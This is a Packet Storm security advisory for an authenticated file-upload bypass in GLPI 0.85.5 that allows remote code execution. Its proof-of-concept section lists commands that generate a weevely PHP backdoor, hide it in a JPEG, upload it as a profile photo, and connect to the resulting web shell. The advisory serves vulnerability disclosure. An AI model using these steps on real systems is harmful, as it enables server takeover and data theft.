exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GLPI 0.85.5 Remote Code Execution / File Upload

GLPI 0.85.5 Remote Code Execution / File Upload
Posted Oct 7, 2015
Authored by Raffaele Forte

GLPI version 0.85.5 suffers from a file upload filter bypass vulnerability that allows for remote code execution.

tags | exploit, remote, code execution, bypass, file upload
SHA-256 | 7debb38db365cb1f5b803b167db247052b9e37082b8722cd6b023196e2a41bf8

GLPI 0.85.5 Remote Code Execution / File Upload

Change Mirror Download
# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3


I. INTRODUCTION
========================================================================

GLPI is the Information Resource-Manager with an additional
Administration-Interface. You can use it to build up a database with an
inventory for your company (computer, software, printers...). It has
enhanced functions to make the daily life for the administrators easier,
like a job-tracking-system with mail-notification and methods to build a
database with basic information about your network-topology.


II. DESCRIPTION
========================================================================


The application allows users to upgrade their own profile. The user has
the possibility to add a new photo as attachment.

The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/".

This file, for example named "photo.jpeg", will be directly accessible
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"
is an ID automatically generated by the system and visible in the HTML
source code.

Besides, the server does not check the extension of the uploaded file,
but only the first bytes within it, that indicates which kind of file is.

Exploiting this flaw, an attacker may upload a tampered jpeg file that
contains php code placed at the end of the file, so that, just changing
the file extention to ".php", by default the php code will be interpreted!

To trigger this vulnerability it is necessary to have an account.

This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images


III. PROOF OF CONCEPT
========================================================================

Generate backdoor:

user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php

Upload the new tampered photo in GLPI > Settings

Run terminal to the target:

user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123


IV. BUSINESS IMPACT
========================================================================
By uploading a interpretable php file, an attacker may be able to
execute arbitrary code on the server.

This flaw may compromise the integrity of the system and/or expose
sensitive information.


V. SYSTEMS AFFECTED
========================================================================
GLPI Version 0.85.5 is vulnerable (probably all previous versions)


VI. VULNERABILITY HISTORY
========================================================================
September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification


VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this
information.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close